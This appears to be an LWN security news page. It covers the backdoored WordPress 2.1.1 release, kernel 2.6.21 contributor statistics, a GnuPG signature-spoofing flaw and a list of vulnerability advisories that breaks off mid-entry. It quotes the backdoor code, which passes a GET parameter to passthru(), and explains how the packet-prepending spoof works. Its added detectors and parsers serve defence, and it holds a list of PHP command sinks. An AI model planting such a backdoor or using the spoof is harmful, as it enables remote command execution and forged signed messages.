WordPress is, according to its web site, "a state-of-the-art semantic
personal publishing platform with a focus on aesthetics, web standards, and
usability." In other words, it is yet another weblog platform written in
PHP. Like many such platforms, it has a fairly long history of security
issues. Even so, the code samples featured in this ifsecure advisory are on
the extreme side. One example:
function get_theme_mcommand($mcds) {
    passthru($mcds);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
Needless to say, code like this is not a programming error - it is a
deliberate backdoor. The project responded quickly, replacing the
compromised 2.1.1 release with a fixed 2.1.2 and sending out an
advisory. Even so, there are probably sites which installed the 2.1.1
release (which appears to have been distributed with the backdoor for about
one week) and which are still vulnerable.
It would be nice if the project would make a little more information
available. As others have noted, there are no checksums of good or
compromised versions of the software. We also know nothing about how the
code was compromised in the first place, beyond this:
It was determined that a cracker had gained user-level access to
one of the servers that powers wordpress.org, and had used that
access to modify the download file.
Inquiring minds want to know how this could have come about; is there a
separate WordPress vulnerability which still needs to be fixed? What steps
have been taken to ensure that this sort of security breach cannot happen
to future WordPress releases? The insertion of backdoors into services
which are directly exposed to the Internet is a scary business; anybody who
is running WordPress should be asking the project some serious questions to
convince themselves that they will not have to go through this again. Your
editor searched in vain for any such discussion in the WordPress forums.
In one sense, WordPress users can consider themselves lucky: the code
implementing the backdoor was so crude that it had little chance of
escaping detection for long. Had the backdoor code been more subtle, it
could well have survived for much longer. One assumes that the WordPress
developers are auditing their code, looking for holes inserted with more
care. But if they are, they are not talking about it.
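A detector for the crude pattern quoted above, as an added example that is not part of the original article or of WordPress: it scans PHP source for request data (`$_GET`, `$_POST` and friends) flowing into a command or code sink, either directly or through a thin wrapper function such as get_theme_mcommand. The PHP sample is constructed, the sink list is an assumption about which built-ins matter, and the matching is a line-based heuristic that will miss a backdoor written with more care, which is exactly the article's worry.

```python
import re

# Constructed PHP sample: the crude backdoor shape quoted above, plus a benign
# function that also takes request data, and a sink call with a constant.
SAMPLE_PHP = r'''<?php
function get_theme_mcommand($mcds) {
    passthru($mcds);
}
function render_title($title) {
    echo htmlspecialchars($title);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
render_title($_GET["t"]);
system("ls -l");
'''

# PHP built-ins that run a string as a shell command or as PHP code (assumed list).
SINKS = {"passthru", "system", "exec", "shell_exec", "popen", "proc_open", "eval"}
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Single-level function bodies are enough for wrappers as thin as the one above;
# nested braces would need a real parser.
FUNC_DEF_RE = re.compile(r"function\s+(\w+)\s*\(([^)]*)\)\s*\{([^}]*)\}")


def _call_args(name, text):
    """Yield the raw argument text of every call to `name` found in `text`."""
    for m in re.finditer(r"\b%s\s*\(([^)]*)\)" % re.escape(name), text):
        yield m.group(1)


def sink_wrappers(source):
    """Names of user functions that pass one of their own parameters straight
    into a sink, e.g. function f($x) { passthru($x); }."""
    wrappers = set()
    for name, params, body in FUNC_DEF_RE.findall(source):
        names = [p.split("=")[0].strip() for p in params.split(",") if p.strip()]
        if any(p in args for sink in SINKS for args in _call_args(sink, body) for p in names):
            wrappers.add(name)
    return wrappers


def find_suspicious_calls(source):
    """(line number, line) for each line where request data is passed
    directly to a sink or to a function that wraps one."""
    callees = SINKS | sink_wrappers(source)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if any(SUPERGLOBAL_RE.search(args) for name in callees for args in _call_args(name, line)):
            hits.append((lineno, line.strip()))
    return hits


if __name__ == "__main__":
    for lineno, line in find_suspicious_calls(SAMPLE_PHP):
        print("line %d: %s" % (lineno, line))
```

Run against a release tarball this reports the line that calls get_theme_mcommand with `$_GET["iz"]` and stays quiet about render_title and the constant system() call; it is a triage aid for the "is anything obviously wrong" pass, not a substitute for checksums and signed releases.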
In general, backdoors are a frightening prospect for free software
developers to ponder. The relatively open nature of many projects must
provide a tempting target for scheming crackers, and it is not that hard to
imagine that a good-enough developer could manage to code a backdoor in a
sufficiently obscure manner that it gets through the review process without
being detected. There may well be a project distributing such code now.
That said, a quick look at the (relatively thin) history of compromised
free software distributions shows that the normal contribution process is
not the preferred way to insert backdoors. Instead, crackers seem to focus
on breaking into servers and modifying code there. We can count ourselves
fortunate; such attacks are easier to detect and recover from.
The real lesson from this episode, as from the ones that came before, is
that there is a real incentive for crackers to insert malware into free
software distributions. (Clearly, the same incentive exists for
proprietary software, but that does not concern us here). Any project
which is distributing code with any security considerations at all (and
that is most code) needs to think about this threat. If your processes -
or your servers - are vulnerable to attack, it may be your project which
finds its way into the headlines for the wrong reasons.
Our article Who wrote 2.6.20?, which appeared two weeks ago, generated a
strong response. There is, it seems, a lot of interest in where this code
is coming from, but nobody had gotten around to doing the crunching to
figure it out. That article calls for a followup in a few ways.
First, those who saw the article early on may want to take another look, as
some of the tables have been changed. There was only one serious mistake
to fix - one developer's affiliation was incorrectly guessed by the code -
but further information has also helped to shrink the "unknown" column
somewhat. The original tables can be found from the article (for whatever
historical reasons may exist), but the tables in the article itself are the
current ones.
The 2.6.21 cycle has moved far enough along as of this writing (the
2.6.21-rc3 prepatch is due any time) that it's worth taking a look
at the statistics for the just over 4,000 changesets which have been
merged. There are some familiar names here, but some new ones as well.
They reflect the different nature of this development cycle: 2.6.21 will
have fewer changes in the virtualization area, for example, but it has some
significant core changes (like the clockevents and dynamic tick work). A
somewhat different set of developers had work ready to merge this time
around, and the results show that.
Anyway, the developers with the most work merged this time around are:
| Most active 2.6.21 developers: by changesets |
| Eric W. Biederman | 104 | 2.5% |
| Ralf Baechle | 77 | 1.9% |
| Adrian Bunk | 71 | 1.7% |
| Bob Moore | 66 | 1.6% |
| Andrew Morton | 54 | 1.3% |
| Takashi Iwai | 54 | 1.3% |
| Robert P. J. Day | 53 | 1.3% |
| Jeff Dike | 52 | 1.3% |
| Jiri Slaby | 51 | 1.2% |
| Ben Dooks | 50 | 1.2% |
| Tejun Heo | 48 | 1.2% |
| Al Viro | 48 | 1.2% |
| David Brownell | 47 | 1.1% |
| YOSHIFUJI Hideaki | 44 | 1.1% |
| Mike Isely | 43 | 1.1% |
| Thomas Gleixner | 38 | 0.9% |
| Randy Dunlap | 38 | 0.9% |
| Stephen Hemminger | 36 | 0.9% |
| Alan Cox | 35 | 0.9% |
| Michael Krufky | 32 | 0.8% |
| Most active 2.6.21 developers: by lines changed |
| Adrian Bunk | 24097 | 6.1% |
| Divy Le Ray | 18255 | 4.6% |
| Ben Dooks | 17510 | 4.4% |
| Andrew Victor | 13877 | 3.5% |
| Ralf Baechle | 9905 | 2.5% |
| YOSHIFUJI Hideaki | 9505 | 2.4% |
| Steve Wise | 9418 | 2.4% |
| Jeff Garzik | 7014 | 1.8% |
| Vitaly Bordug | 6387 | 1.6% |
| Thomas Gleixner | 6078 | 1.5% |
| Bob Moore | 6055 | 1.5% |
| Ishizaki Kou | 5912 | 1.5% |
| Richard Purdie | 5909 | 1.5% |
| Liam Girdwood | 5773 | 1.5% |
| Frank Mandarino | 5284 | 1.3% |
| Jay Cliburn | 5182 | 1.3% |
| Tejun Heo | 5120 | 1.3% |
| Kumar Gala | 5044 | 1.3% |
| Martin Schwidefsky | 4729 | 1.2% |
| Olof Johansson | 4659 | 1.2% |
On the side of removing code, the list of names remains about the same:
| Developers with the most lines removed |
| Adrian Bunk | 23720 | 12.8% |
| Jeff Garzik | 6808 | 3.7% |
| Paul Mundt | 2442 | 1.3% |
| Bob Moore | 1526 | 0.8% |
| Len Brown | 1244 | 0.7% |
| Alexey Starikovskiy | 987 | 0.5% |
| Jiri Slaby | 954 | 0.5% |
| Kenji Kaneshige | 661 | 0.4% |
| Eric Sandeen | 609 | 0.3% |
| Tim Schmielau | 547 | 0.3% |
Adrian Bunk continues to remove code from the kernel at an amazing rate.
Also about the same is the table of signoffs:
| Developers with the most signoffs (total 8614) |
| Andrew Morton | 1000 | 11.6% |
| Linus Torvalds | 865 | 10.0% |
| Jeff Garzik | 346 | 4.0% |
| Jaroslav Kysela | 224 | 2.6% |
| Greg Kroah-Hartman | 224 | 2.6% |
| David Miller | 208 | 2.4% |
| Mauro Carvalho Chehab | 206 | 2.4% |
| Len Brown | 202 | 2.3% |
| Takashi Iwai | 187 | 2.2% |
| Ralf Baechle | 156 | 1.8% |
| Russell King | 153 | 1.8% |
| Paul Mackerras | 151 | 1.8% |
| James Bottomley | 114 | 1.3% |
| Eric W. Biederman | 105 | 1.2% |
| Adrian Bunk | 99 | 1.1% |
| Andi Kleen | 94 | 1.1% |
| Alexey Starikovskiy | 82 | 1.0% |
| Kyle McMartin | 79 | 0.9% |
| David Brownell | 78 | 0.9% |
| Ingo Molnar | 68 | 0.8% |
The list of developers contributing code to a given kernel release can
change over time, but the people through whom those patches pass - the
subsystem maintainers - remain about the same. These developers form the
infrastructure which does the work of getting reviewed code into the
mainline kernel.
Here are the by-employer tables for 2.6.21-rc:
| Top contributors by employer: by changesets |
| (Unknown) | 1108 | 27.1% |
| (None) | 380 | 9.3% |
| Red Hat | 304 | 7.4% |
| Intel | 280 | 6.8% |
| IBM | 259 | 6.3% |
| Novell | 258 | 6.3% |
| Linux Foundation | 159 | 3.9% |
| Linux Networx | 104 | 2.5% |
| (Consultant) | 100 | 2.4% |
| Oracle | 89 | 2.2% |
| MIPS Technologies | 77 | 1.9% |
| Google | 61 | 1.5% |
| MontaVista | 55 | 1.3% |
| SGI | 54 | 1.3% |
| Simtec | 50 | 1.2% |
| Nokia | 41 | 1.0% |
| TimeSys | 38 | 0.9% |
| Sony | 36 | 0.9% |
| HP | 35 | 0.9% |
| Toshiba | 34 | 0.8% |
| Top contributors by employer: by lines changed |
| (Unknown) | 85436 | 21.5% |
| (None) | 52312 | 13.2% |
| IBM | 28186 | 7.1% |
| Intel | 20778 | 5.2% |
| Red Hat | 19007 | 4.8% |
| Novell | 18702 | 4.7% |
| Chelsio | 18361 | 4.6% |
| Simtec | 17545 | 4.4% |
| SANPeople | 13949 | 3.5% |
| MIPS Technologies | 12646 | 3.2% |
| Open Grid Computing | 9442 | 2.4% |
| MontaVista | 8861 | 2.2% |
| Toshiba | 7462 | 1.9% |
| Wolfson Microelectronics | 7379 | 1.9% |
| Sony | 7061 | 1.8% |
| Freescale | 6993 | 1.8% |
| TimeSys | 6184 | 1.6% |
| Endrelia | 5421 | 1.4% |
| Nokia | 4790 | 1.2% |
| Renesas Technology | 4740 | 1.2% |
Many of the names are the same, but Red Hat does not dominate to quite the
same extent as in 2.6.20. The percentage of patches contributed by
developers known to be working on their own time has increased slightly.
Finally, some commenters on the original article requested the release of
the code used to generate the numbers. Your editor has some qualms about
doing so. The biggest among them is not that the code is an
embarrassing hack with, presumably, at least one bug still in it. Neither
is it the fact that the code could be seen as a competitive tool for LWN;
frankly, there's nothing that complicated there.
The biggest worry is related to the attention these numbers drew, and the
fact that a couple of developers have mailed in to note that they have
received job offers as a result of appearing in the LWN lists. In
addition, a few employers have contacted us to be sure that their
"account" is credited with the work of all of their employees. The
numbers your editor has generated are approximations, but some people
clearly see them as being important.
The editors
at LWN have an interest in covering the free software community while
minimizing the changes that such coverage might cause - most of the time,
at least. It seems plausible that, if the "top 20 contributors list" is
seen as a desirable place
to appear - with positive career benefits - developers might change their
behavior as a result. It would be a shame to start seeing kernel patches
aimed mainly at increasing a developer's count of lines changed. Such
patches, one assumes, would not fare well in the review process, but it
would be better if the situation did not come up at all.
The issue of the mapping between developers and their employers is also
worth some consideration. Some of that information was obtained directly
from the developers with a promise not to disclose it further; that promise
must be kept. Beyond that, developers tend to change employers over time,
and the code is not currently smart enough to deal with that. This
shortcoming is not a problem when looking at a single release cycle, but it
clearly would be an issue for multi-year analysis. The code could be
improved, but it's not at all clear that the maintenance and distribution of a
database of kernel developers' work histories is something LWN wants to get
into. There are serious privacy issues to consider.
Despite these worries, the code is being released. In the end, it's not as
if somebody else would have all that much trouble reproducing it. Some of
the employer information has been taken out in response to the concerns outlined
above, though. A tarball of the initial release can be found here;
your editor is looking forward to the flood of patches which will improve
the system.
Page editor: Jonathan Corbet
Security
March 7, 2007
This article was contributed by Jake Edge.
An advisory about a problem
in GNU Privacy Guard (GnuPG) would normally cause worries about an
implementation flaw leading to insecurely encrypted data. Thankfully, this
particular vulnerability does not fall into that category and data encrypted
using GnuPG is not at risk from it; it is, instead, a hole which allows
attackers to spoof signatures.
This vulnerability highlights an interesting
interaction between GnuPG and the applications that use it. The flaw is not
so much in how GnuPG does its work, rather it is in how it presents it.
GnuPG is an implementation of the OpenPGP standard which governs messages
encrypted with public-key encryption. The standard is described in RFC 2440
and is descended from the original Pretty Good Privacy (PGP) program that
Phil Zimmermann released (much to the chagrin of the US Government) in
1991. Many different mail programs use GnuPG (or the related GnuPG Made
Easy (GPGME) library) to handle encrypted email; these programs include
most open source email clients (KMail, Evolution, Thunderbird via the
EnigMail plugin, mutt, etc.). All are vulnerable to the spoof - as is the
gpg command-line tool, depending on how it is used.
One of the features of OpenPGP is digital signing of
messages so that the recipient can ensure that the message they
receive is the same as the one that was sent. It is this digital
signature that is vulnerable to this attack as it can be spoofed; making it
appear that unsigned text is covered by a valid signature. An attacker
can insert malicious text into an existing message and have it appear
to have been sent by the signer.
OpenPGP messages consist of a set of "packets" that correspond to different
sections of a message (plaintext, encrypted, signature, compressed,
ascii-armored, etc). Taking two valid OpenPGP messages and concatenating
them produces a longer, but still valid, OpenPGP message. The simplest
way to exploit the flaw is to take a plaintext packet and add it to the
front of a signed plaintext packet. If the user attempts to verify
the message by invoking gpg < msgfile, they will see the contents
of both of the plaintext packets followed by a statement that the
signature was verified. Nothing in the output indicates the presence of
two packets with different signature status.
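The packet structure described above can be checked before any "signature verified" message is trusted. The following is an added example, not code from GnuPG or from the advisory: a minimal parser for OpenPGP packet headers that handles both old- and new-format headers, including partial body lengths (which goes beyond the two-packet case in the text), and then counts literal data packets. The sample messages are constructed; the one-pass-signature and signature bodies are placeholders, so only the packet framing is realistic, which is all the spoof relies on.

```python
import struct

# OpenPGP packet tags used here (RFC 2440 section 4.3)
SIGNATURE, ONE_PASS_SIG, LITERAL_DATA = 2, 4, 11


def _new_format_length(data, pos):
    """Decode a new-format body length starting at data[pos].
    Returns (length, position after the length field, is_partial)."""
    if pos >= len(data):
        raise ValueError("truncated length field at offset %d" % pos)
    first = data[pos]
    if first < 192:
        return first, pos + 1, False
    if first < 224:
        return ((first - 192) << 8) + data[pos + 1] + 192, pos + 2, False
    if first == 255:
        return struct.unpack(">I", data[pos + 1:pos + 5])[0], pos + 5, False
    return 1 << (first & 0x1F), pos + 1, True          # partial body length


def parse_packets(data):
    """Split a binary OpenPGP message into a list of (tag, body) pairs."""
    packets, pos = [], 0
    while pos < len(data):
        ctb = data[pos]
        if not ctb & 0x80:
            raise ValueError("not a packet header at offset %d" % pos)
        pos += 1
        if ctb & 0x40:                                   # new-format header
            tag, body, partial = ctb & 0x3F, b"", True
            while partial:                               # glue partial-length chunks together
                length, pos, partial = _new_format_length(data, pos)
                body += data[pos:pos + length]
                pos += length
        else:                                            # old-format header
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            if ltype == 3:                               # indeterminate: runs to end of input
                length = len(data) - pos
            else:
                size = (1, 2, 4)[ltype]
                length = int.from_bytes(data[pos:pos + size], "big")
                pos += size
            body = data[pos:pos + length]
            pos += length
        if pos > len(data):
            raise ValueError("truncated packet body")
        packets.append((tag, body))
    return packets


def literal_data_count(data):
    return sum(1 for tag, _ in parse_packets(data) if tag == LITERAL_DATA)


def signature_report_is_unambiguous(data):
    """True only when the message holds exactly one literal data packet and a
    signature packet, so that a 'good signature' result covers all the text
    the user will see. A prepended literal packet fails this check."""
    tags = [tag for tag, _ in parse_packets(data)]
    return tags.count(LITERAL_DATA) == 1 and SIGNATURE in tags


def _packet(tag, body):
    """Encode body as a new-format packet with a one-octet length."""
    assert len(body) < 192
    return bytes([0xC0 | tag, len(body)]) + body


def _literal(text):
    # format 'b', empty filename, zero timestamp, then the data
    return _packet(LITERAL_DATA, b"b\x00\x00\x00\x00\x00" + text)


# Constructed sample messages; the signature-related bodies are placeholders.
SIGNED_MESSAGE = (_packet(ONE_PASS_SIG, b"placeholder-ops-body")
                  + _literal(b"Meeting moved to 10:00.")
                  + _packet(SIGNATURE, b"placeholder-signature-body"))
PREPENDED_MESSAGE = _literal(b"Please send the report to me first.") + SIGNED_MESSAGE

if __name__ == "__main__":
    for name, msg in (("signed", SIGNED_MESSAGE), ("prepended", PREPENDED_MESSAGE)):
        print(name, [t for t, _ in parse_packets(msg)], signature_report_is_unambiguous(msg))
```

The check deliberately refuses any input with more than one literal data packet rather than trying to work out which one the signature covers; that is the same conservative choice the updated GnuPG makes by refusing to process multiple messages in one invocation.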
If this were the only issue, there would be a relatively easy, but not
completely satisfying, workaround; do not redirect stdin from a
file when using gpg. When
it is invoked as gpg msgfile, GnuPG writes each individual plaintext
packet into a separate file and, depending on the filenames specified in
the packet, the above example would either create two
files or prompt asking whether to overwrite when it encounters
the second packet. That prompt, or the presence of two files, might be
enough to alert the observant user to an anomaly, but is hardly foolproof.
Unfortunately, mail clients typically invoke gpg via the output
end of a pipe which allows them to be spoofed.
GnuPG does provide the --status-fd mode to prevent just this kind of
attack by producing more status information on the specified file descriptor.
The status information is not particularly user-friendly and might not
alert a casual user to the spoof, but it certainly can be used by a program
to detect the spoof. This is how GnuPG recommends that it be used by other
programs but the developers of many mail clients ignored that advice with
the result that their code is vulnerable.
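What a program consuming --status-fd output should look for, as an added example rather than GnuPG's or GPGME's own code: every PLAINTEXT status line marks the start of another plaintext section, and a GOODSIG or VALIDSIG line vouches only for the section it follows, so a result can be shown as "verified" only when there is exactly one section and that section is signed. The status lines below are constructed, with all-zero key ids and fingerprints as placeholders; the full set of keywords GnuPG emits is documented in its doc/DETAILS file.

```python
SIGNATURE_RESULTS = {"GOODSIG", "VALIDSIG", "BADSIG", "ERRSIG"}


def plaintext_sections(status_lines):
    """Group status-fd output into plaintext sections. Each PLAINTEXT line
    opens a new section; signature results are attributed to the section
    that was current when they appeared."""
    sections = []
    for line in status_lines:
        if not line.startswith("[GNUPG:] "):
            continue                     # ordinary output may share the descriptor
        fields = line.split()
        keyword = fields[1] if len(fields) > 1 else ""
        if keyword == "PLAINTEXT":
            sections.append({"format": fields[2] if len(fields) > 2 else None, "results": []})
        elif keyword in SIGNATURE_RESULTS:
            if not sections:             # signature status with no plaintext seen yet
                sections.append({"format": None, "results": []})
            sections[-1]["results"].append(keyword)
    return sections


def verdict(status_lines):
    """'good' only when exactly one plaintext section exists and it carries a
    good signature; anything else must not be presented as verified."""
    sections = plaintext_sections(status_lines)
    if not sections:
        return "nodata"
    if len(sections) != 1:
        return "spoofed"                 # mixed signature status across sections
    results = set(sections[0]["results"])
    if results & {"BADSIG", "ERRSIG"}:
        return "bad"
    if "GOODSIG" in results:
        return "good"
    return "unsigned"


# Constructed status output for one correctly signed message (placeholder ids).
STATUS_SIGNED = [
    "[GNUPG:] PLAINTEXT 62 1173000000 ",
    "[GNUPG:] SIG_ID 0000000000000000000000000000 2007-03-05 1173000000",
    "[GNUPG:] GOODSIG 0000000000000000 Example Signer <signer@example.org>",
    "[GNUPG:] VALIDSIG 0000000000000000000000000000000000000000 2007-03-05 1173000000",
]
# The same message with an unsigned literal data packet in front of it: a
# second PLAINTEXT appears, and GOODSIG is still reported at the end.
STATUS_PREPENDED = ["[GNUPG:] PLAINTEXT 62 1173000000 "] + STATUS_SIGNED
STATUS_BAD = [STATUS_SIGNED[0],
              "[GNUPG:] BADSIG 0000000000000000 Example Signer <signer@example.org>"]

if __name__ == "__main__":
    for name, lines in (("signed", STATUS_SIGNED), ("prepended", STATUS_PREPENDED), ("bad", STATUS_BAD)):
        print(name, verdict(lines))
```

A message made of two separately signed sections is also reported as "spoofed" here; that is intentional, since a single "verified" badge cannot express two signature results, and it matches the updated GnuPG's refusal to handle multiple messages in one run.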
Normally this might be considered a problem for the mail
client developers to solve, but the GnuPG team decided to make changes to
GnuPG and GPGME to alleviate the problem.
Updated versions of GnuPG will no longer process multiple messages in a
single invocation, avoiding the mingling of packets with
different signature status. GPGME has been changed to avoid the spoofing
even when it is using a vulnerable version of GnuPG. It is likely that the
various mail clients will need to be updated eventually as well because
they may well rely on GnuPG to process multiple messages in a single pass.
The mail clients may not correctly process all of the email types that they
did in the past, but they will not be vulnerable to this kind of attack.
The advisory has a wealth of information about the flaw and various ways that
it can be exploited; it is well worth a read for those interested. This is
an interesting bug because it lives between the GnuPG software and its
users (both human and program). The GnuPG developers could have pushed this
off as a problem for those users, but took a more helpful approach. If the
command-line version (gpg < msgfile) of the flaw did not exist,
it seems possible that they would have chosen differently and the mail client
development teams would instead be scrambling to release updates.
Brief items
The Month of PHP Bugs (March) has been announced. "This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core. During March 2007 old and new security vulnerabilities in the Zend Engine, the PHP core and the PHP extensions will be disclosed on a day by day basis. We will also point out necessary changes in the current vulnerability manag[e]ment process used by the PHP Security Response Team."
New vulnerabilities
GnuPG: unsigned data injection vulnerability
| Package(s): | gnupg |
| CVE #(s): | CVE-2007-1263 |
| Created: | March 6, 2007 |
| Updated: | March 30, 2007 |
| Description: | Core Security Technologies has reported that GnuPG and GnuPG clients are vulnerable to an unsigned data injection vulnerability. |
mod_jk: stack overflow
| Package(s): | mod_jk |
| CVE #(s): | CVE-2007-0774 |
| Created: | March 5, 2007 |
| Updated: | May 30, 2007 |
| Description: | A stack overflow flaw was found in the URI handler of mod_jk. A remote attacker could visit a carefully crafted URL being handled by mod_jk and trigger this flaw, which could lead to the execution of arbitrary code as the 'apache' user. |
mod_python: information disclosure
| Package(s): | libapache2-mod-python |
| CVE #(s): | CVE-2004-2680 |
| Created: | March 7, 2007 |
| Updated: | March 8, 2007 |
| Description: | From the Ubuntu advisory: Miles Egan discovered that mod_python, when used in output filter mode, did not handle output larger than 16384 bytes, and would display freed memory, possibly disclosing private data. |
snort: remote arbitrary code execution
| Package(s): | snort |
| CVE #(s): | CVE-2006-5276 |
| Created: | March 2, 2007 |
| Updated: | September 7, 2007 |
| Description: | The Snort intrusion detection system is vulnerable to a buffer overflow in the DCE/RPC preprocessor code. Remote attackers can send specially crafted fragmented SMB or DCE/RPC packets which can be used to allow the remote execution of arbitrary code. |
STLport: buffer overflows
| Package(s): | STLport |
| CVE #(s): | CVE-2007-0803 |
| Created: | March 7, 2007 |
| Updated: | March 7, 2007 |
| Description: | STLport (prior to version 5.0.3) suffers from two remotely exploitable buffer overflows. |
tcpdump: denial of service
| Package(s): | tcpdump |
| CVE #(s): | CVE-2007-1218 |
| Created: | March 5, 2007 |
| Updated: | November 15, 2007 |
| Description: | Off-by-one buffer overflow in the parse_elements function in the 802.11 printer code (print-802_11.c) for tcpdump 3.9.5 and earlier allows remote attackers to cause a denial of service (crash) via a crafted 802.11 frame. NOTE: this was originally referred to as heap-based, but it might be stack-based. |
util-linux: information disclosure
| Package(s): | util-linux |
| CVE #(s): | CVE-2007-0822 |
| Created: | March 7, 2007 |
| Updated: | March 7, 2007 |
| Description: | Users can confuse util-linux by way of removable drives, leading to crashes and the possibility of information disclosure via the resulting core dumps. |
wordpress: cross-site scripting
| Package(s): | wordpress |
| CVE #(s): | CVE-2007-1049 |
| Created: | March 5, 2007 |
| Updated: | March 21, 2007 |
| Description: | A cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable. |
Updated vulnerabilities
acroread: multiple vulnerabilities
| Package(s): | acroread |
| CVE #(s): | CVE-2006-5857, CVE-2007-0045, CVE-2007-0046 |
| Created: | January 11, 2007 |
| Updated: | October 26, 2009 |
| Description: | Adobe's Acrobat Reader has the following vulnerabilities:
The Adobe Reader plugin has a cross-site scripting vulnerability that can be triggered by processing malformed URLs. Arbitrary JavaScript can be served by a malicious web server, leading to a cross-site scripting attack.
Maliciously crafted PDF files can be used to trigger two vulnerabilities; if an attacker can trick a user into viewing the files, arbitrary code can be executed with the user's privileges. |
apache: cross-site scripting
| Package(s): | apache |
| CVE #(s): | CVE-2006-3918 |
| Created: | August 9, 2006 |
| Updated: | April 4, 2008 |
| Description: | From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header." |
bind: denial of service
| Package(s): | bind |
| CVE #(s): | CVE-2007-0493, CVE-2007-0494 |
| Created: | January 26, 2007 |
| Updated: | March 14, 2007 |
| Description: | The bind package is vulnerable to two remote denial of service attacks in which attackers can cause the bind daemon to crash or exit unexpectedly by providing malformed data to the daemon in a DNS request. |
bluez-utils: hidd vulnerability
| Package(s): | bluez-utils |
| CVE #(s): | CVE-2006-6899 |
| Created: | January 16, 2007 |
| Updated: | May 14, 2007 |
| Description: | hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain control of the Mouse and Keyboard Human Interface Device (HID) via a certain configuration of two HID (PSM) endpoints, operating as a server, aka HidAttack. |
bugzilla: multiple vulnerabilities
| Package(s): | bugzilla |
| CVE #(s): | CVE-2006-5453, CVE-2006-5454, CVE-2006-5455 |
| Created: | November 10, 2006 |
| Updated: | August 28, 2007 |
| Description: | Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before being passed back to users.
Users can gain unauthorized access to read attachment descriptions while using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized actions due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly sanitized before being returned to users. |
busybox: insecure password generation
| Package(s): | busybox |
| CVE #(s): | CVE-2006-1058 |
| Created: | May 5, 2006 |
| Updated: | May 2, 2007 |
| Description: | The BusyBox 1.1.1 passwd command does not use a proper salt when generating passwords. This would create an instance where a brute force attack could take very little time. |
chmlib: remote execution of arbitrary code
| Package(s): | chmlib |
| CVE #(s): | CVE-2007-0619 |
| Created: | February 27, 2007 |
| Updated: | February 28, 2007 |
| Description: | When certain CHM files that contain tables and objects stored in pages are parsed by CHMlib, an unsanitized value is passed to the alloca() function resulting in a shift of the stack pointer to arbitrary memory locations. An attacker could entice a user to open a specially crafted CHM file, resulting in the execution of arbitrary code with the permissions of the user viewing the file. |
clamav: directory traversal, denial of service
| Package(s): | clamav |
| CVE #(s): | CVE-2007-0897, CVE-2007-0898 |
| Created: | February 20, 2007 |
| Updated: | March 7, 2007 |
| Description: | Clam AntiVirus ClamAV before 0.90 does not close open file descriptors under certain conditions, which allows remote attackers to cause a denial of service (file descriptor consumption and failed scans) via CAB archives with a cabinet header record length of zero, which causes a function to return without closing a file descriptor. (CVE-2007-0897)
Directory traversal vulnerability in clamd in Clam AntiVirus ClamAV before 0.90 allows remote attackers to overwrite arbitrary files via a .. (dot dot) in the id MIME header parameter in a multi-part message. (CVE-2007-0898) |
cpio: arbitrary code execution
| Package(s): | cpio |
| CVE #(s): | CVE-2005-4268 |
| Created: | January 2, 2006 |
| Updated: | March 17, 2010 |
| Description: | Richard Harms discovered that cpio did not sufficiently validate file properties when creating archives. Files with e.g. a very large size caused a buffer overflow. By tricking a user or an automatic backup system into putting a specially crafted file into a cpio archive, a local attacker could probably exploit this to execute arbitrary code with the privileges of the target user (which is likely root in an automatic backup system). |
vixie-cron: privilege escalation
| Package(s): | cron |
| CVE #(s): | CVE-2006-2607 |
| Created: | May 31, 2006 |
| Updated: | June 1, 2009 |
| Description: | The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root. |
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2006-4262 |
| Created: | October 2, 2006 |
| Updated: | June 16, 2009 |
| Description: | Will Drewry of the Google Security Team discovered several buffer overflows in cscope, a source browsing tool, which might lead to the execution of arbitrary code. |
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2004-2541 |
| Created: | May 22, 2006 |
| Updated: | June 19, 2009 |
| Description: | A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows remote attackers to execute arbitrary code via a C file with a long #include line that is later browsed by the target. |
Cyrus-SASL: DIGEST-MD5 pre-authentication denial of service
| Package(s): | cyrus-sasl |
| CVE #(s): | CVE-2006-1721 |
| Created: | April 21, 2006 |
| Updated: | September 4, 2007 |
| Description: | Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5 process that could lead to a denial of service. An attacker could possibly exploit this vulnerability by sending a specially crafted data stream to the Cyrus-SASL server, resulting in a denial of service even if the attacker is not able to authenticate. |
dovecot: index cache file handling error
| Package(s): | dovecot |
| CVE #(s): | CVE-2006-5973 |
| Created: | November 29, 2006 |
| Updated: | May 8, 2007 |
| Description: | The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable. |
ekiga: format string vulnerability
| Package(s): | ekiga |
| CVE #(s): | CVE-2007-1006, CVE-2007-0999 |
| Created: | February 21, 2007 |
| Updated: | March 30, 2007 |
| Description: | Ekiga contains a format string vulnerability in the code which processes control messages from remote peers. If a user was running Ekiga and listening for incoming calls, a remote attacker could send a crafted call request, and execute arbitrary code with the user's privileges. |
elinks: arbitrary file access
| Package(s): | elinks |
| CVE #(s): | CVE-2006-5925 |
| Created: | November 16, 2006 |
| Updated: | October 22, 2009 |
| Description: | The elinks text-mode browser has an arbitrary file access vulnerability in the Elinks SMB protocol handler. If a user can be tricked into visiting a specially crafted web page, arbitrary files may be read or written with the user's permissions. |
enigmail: memory allocation errors
| Package(s): | enigmail |
